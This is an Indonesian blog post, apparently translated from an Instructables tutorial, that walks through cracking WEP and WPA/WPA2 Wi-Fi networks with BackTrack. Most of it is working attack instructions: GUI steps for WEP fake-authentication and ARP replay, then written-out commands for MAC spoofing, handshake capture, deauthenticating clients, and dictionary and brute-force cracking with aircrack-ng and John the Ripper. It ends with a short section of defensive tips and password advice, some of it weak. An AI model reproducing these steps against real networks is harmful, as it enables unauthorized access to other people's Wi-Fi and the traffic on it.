Cara Hacking Wifi (Dan Bagaimana untuk Menghindarinya): WEP/WPA/WPA2 (How to Hacking Wifi (And How to Avoid It): WEP / WPA / WPA2)




Panduan ini dimaksudkan untuk menunjukkan bagaimana mudahnya untuk hacking jaringan nirkabel (wireless) jika langkah-langkah keamanan yang tepat tidak diterapkan pada tempatnya. Pertama saya akan menunjukkan cara hack jaringan WEP atau WPA/WPA2 dan kemudian saya akan memberikan tips tentang cara untuk menghindari hacked.
Ini adalah informasi penting techno-savy dalam budaya kita. Jika jaringan nirkabel Sobat terganggu, maka Anda adalah orang yang bertanggung jawab atas segala aktivitas ilegal di atasnya. Ada banyak cerita dari pornografi anak dan black-hat hacker menggunakan jaringan nirkabel orang lain.
Tutorial ini didapat dari http://www.instructables.com, jika Sobat ingin membaca langsung tutorial aslinya karna translate di blog ini amburadul monggo lewat link ini: How to Hack Wifi (and how to avoid being hacked): WEP/WPA/WPA2

CATATAN: Hacking Wifi tetangga Anda atau orang lain tanpa izin mereka adalah ILEGAL. Jadilah hacker cerdas!

Step 1What you Need


  • Sebuah Komputer. (Sebuah Laptop lebih baik)
  • Sebuah Wireless Card yang memiliki kemampuan paket menginjeksi. Jika  Wireless Card laptop Sobat tidak bisa melakukan paket injeksi, Sobat dapat membeli adaptor nirkabel seperti Netgear WG111 v2 seharga $ 8 - $ 12 di eBay.
  • Sebuah instalasi Live BackTrack baik pada CD atau USB stick.
  • BackTrack 5 Dapat ditemukan [Download Di Sini]
  • Membuat sebuah Install Live USB [Download Di Sini]

Step 2Hack WEP


WEP adalah pendahulu dari WPA dan telah di-hack selama + 5 tahun terakhir namun orang terus menggunakannya. Dengan petunjuk di bawah ini kita bisa memecahkan (crack) WEP dalam waktu kurang dari 15 menit.
Sobat dapat meng-crack WEP dari baris perintah (command line) tetapi ada antarmuka GUI yang mudah di backtrack, yang menjadikannya pengalaman yang terlalu menyakitkan bagi mereka yang takut pada perintah prompt (command prompt).
  • Boot ke dalam BackTrack
  • Click pada menu aplikasi Backtrack -> Backtrack -> Exploitation tools -> Wireless exploitation -> WLAN Exploitation -> gerix-wifi-cracker-ng (Ini akan membuka antarmuka GUI terlihat dalam gambar).
  • Buka menu konfigurasi dan pilih wireless interface wlan0. 
  1. Klik Enable/Disable Monitor Mode (ini akan menempatkan wireless card ke monitor mode). 
  2. Pilih antarmuka mon0  yang baru dibuat.
  • Sekarang klik pada tab WEP di bagian atas window.
  1. Click pada "Start sniffing and logging" dan biarkan terminal terbuka.
  2. Setelah jaringan nirkabel Anda ingin crack* muncul (harus enkripsi WEP tentunya) pilih WEP Attack (dengan clien). * Perhatikan bahwa PWR harus cukup tinggi untuk bekerja, sehingga jika Anda semakin mendekati bisa mendapatkan, semakin baik.
  3. Di sana Anda klik "Associate with AP using fake auth", tunggu beberapa detik dan klik "ARP request replay".
  • Setelah jumlah data mencapai lebih dari 10.000, Sobat siap untuk mencoba (jika data akan datang tunggu cepat sampai 20 atau 30.000 lebih aman) dan memecahkan (crack) kunci, tapi jangan menutup jendela apapun. - Buka tab cracking dan klik "aircrack-ng - Decrypt WEP password" di bawah Wep Cracking.
Ini akan memakan waktu beberapa detik hingga menit untuk memecahkan sandi dan kemudian Sobat bisa memulai masuk

Step 3Hack WPA/WPA2


Jadi paling tidak WPA dan WPA2 ini lebih aman? Salah. WPA dan WPA2 keduanya crackable (sangat mudah dipecahkan) tetapi waktu yang dibutuhkan untuk memecahkan tergantung pada kekuatan password mereka.
  • Boot ke dalam BackTrack
  • Buka Konsole yang merupakan sebuah command line utility dibuat ke dalam BackTrack. Ini adalah Black Box in the Lower-Left Hand Corner (Lihat Gambar).
Kita sekarang akan memasukkan perintah berikut ke dalam baris perintah yang ditulis Bold (Tebal) dan juga penjelasan mengenai apa yang mereka lakukan:

1:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0

2:
Sekarang kita akan menempatkan tool airodump-ng ke modus monitor, ini akan memungkinkan kita untuk melihat semua jaringan nirkabel di sekitar kita (Lihat Gambar pertama).

airodump-ng mon0

Sekarang memilih jaringan yang ingin Sobat hack dan mencatat BSSID, dan salah satu Channel serta ESSID. PWR ini harus cukup tinggi untuk dapat di-hack, ini ditentukan oleh seberapa dekat Sobat ke router nirkabel. Semakin dekat, semakin baik.

Setelah Anda memilih jaringan nirkabel memasukkan berikut ke dalam terminal:
Ini akan menulis paket menangkap dan menempatkan mereka ke dalam file "filename", kami mencoba untuk menangkap handshake antara router dan koneksi nirkabel yang akan memberikan kita kunci kita perlu untuk meng-crack.
3:
airodump-ng mon0 --channel * --bssid **:**:**:**:**:** -w filename

Langkah berikut adalah opsional tapi sangat dianjurkan karena akan mempercepat banyak proses.
Setelah "WPA handshake: **: **: **: **: **: **" muncul di sudut kanan atas kita bisa terus berjalan. Jika Sobat mengalami kesulitan mendapatkan terjadi handshake WPA maka lakukan langkah 4.

4:
aireplay-ng -0 1 -a **:**:**:**:**:** -c **:**:**:**:**:** mon0

Apa langkah (4) tidak itu deauthorizes koneksi nirkabel dan coba untuk mendirikan kembali ,sehingga akan menghasilkan sebuah handshake baru untuk menangkap. Langkah ini berakhir setelah Anda telah menangkap proses handshake.

5:
aircrack-ng –w wordlist.lst -b **:**:**:**:**:** filename.cap

Pada Step 5 ini kita mencoba untuk memecahkan sandi dalam "filename.cap" degan menggunakan daftar kata, di sini disebut "wordlist.lst" Anda dapat men-download kamus 200 juta kata yang baik (128MB tapi kalau di-unzip menjadi 800MB).
Komputermu memiliki kemampuan untuk menghitung nilai hash dari password setiap dalam daftar itu, tetapi komputer hanya dapat melalui 200 juta password dalam 6-12 jam.

6:

Jika password tidak ditemukan dalam kamus Anda dapat mencoba dan secara brutal memaksa password (brute-force) dengan perintah ini: (Perhatikan ini bisa memakan waktu yang sangat lama tergantung pada kekuatan password mereka).

/pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b **:**:**:**:**:** -w - filename.cap


Step 4Secure Your Own Wireless Network


Mudah-mudahan Sobat bisa mendapatkan beberapa wawasan tentang bagaimana untuk menghindari koneksi nirkabel kena hack:
  1. Gunakan WPA2 (WPA2-AES) jika tersedia dan dengan segala cara jangan pernah menggunakan WEP.
  2. Jangan menjadi dasar kata sandi Anda pada kata kamus. Bagian berikutnya berfokus pada password pada umumnya.
  3. Dalam pengaturan router Anda, Anda biasanya dapat menyembunyikan ESSID (nama jaringan nirkabel) ini akan menambah lapisan sedikit pada keamanan.
  4. Pada router Anda mungkin ada layanan mac-address filtering di mana Anda dapat menentukan alamat mac yang diizinkan untuk menghubungkan. Hal ini akan memastikan bahwa hanya perangkat Anda disetujui dapat terhubung ke jaringan Anda. (jelas masalah meskipun jika Anda memiliki tamu lebih dan ingin terhubung ke Wifi).

Step 5Passwords


Sobat harus memiliki password yang baik pada hari ini dan akan datang. Jika tidak informasi kartu kredit Anda, informasi pribadi Anda dan identitas akan tersedia untuk mereka yang ingin menggunakannya dan menyalahgunakannya. Berikut adalah beberapa panduan untuk datang dengan sebuah password yang aman:
  1. Lebih dari 8 karakter.
  2. Mengunakan angka, huruf dan karakter unik, misalnya:  $ # % ^ @ !
  3. Jangan menggunakan kata yang terdapat dalam kamus umum
  4. Gunakan  Multiple transitions, misalnya: aaa111aaa111 not aaaa11111.
Pertanyaannya: "Bagaimana saya mengingat password-nya??"

Misalkan Sobat ingin kata seperti: calculus dan pengganti huruf dan karakter lain untuk dijadikan kata, misalnya: c @ 1cu1u $
Ini masih didasarkan pada kamus kata meskipun begitu Sobat tetap harus membuat lebih sulit seperti menambahkan sesuatu ke akhir atau awal.
Saya juga sangat menyarankan menggunakan password yang berbeda untuk setiap website, bagaimana Anda bisa melakukannya dengan mudah? Ingat variabel acak dalam aljabar? Memiliki variabel acak password Anda yang didasarkan pada website atau beberapa informasi lainnya.

Misalnya: XpasswordY dimana X pertama adalah huruf terakhir dari nama website dan Y terakhir adalah huruf pertama dari nama website:

Jadi password situs Instructables akan SpasswordI atau password Facebook akan KpasswordF dan password Hotmail akan LpasswordH.
Mungkin tampak seperti banyak tapi ada baiknya, karna memberi waktu untuk mencegah  potensi pencurian identitas, uang dan hidup Sobat akan hancur.

Comments

Popular posts from this blog

CARA TINGKATKAN VIEWERS. LIKE, SUBCRIBE, FOLOWERS YOUTUBE, IG, TWITER DLL

cara membobol password WiFi/Hotspot yang menggunakan halaman Login (Login Page) Dengan Software TMAC v5 R3 (how to break WiFi password / Hotspot using Login page (Login Page) With TMAC Software v5 R3)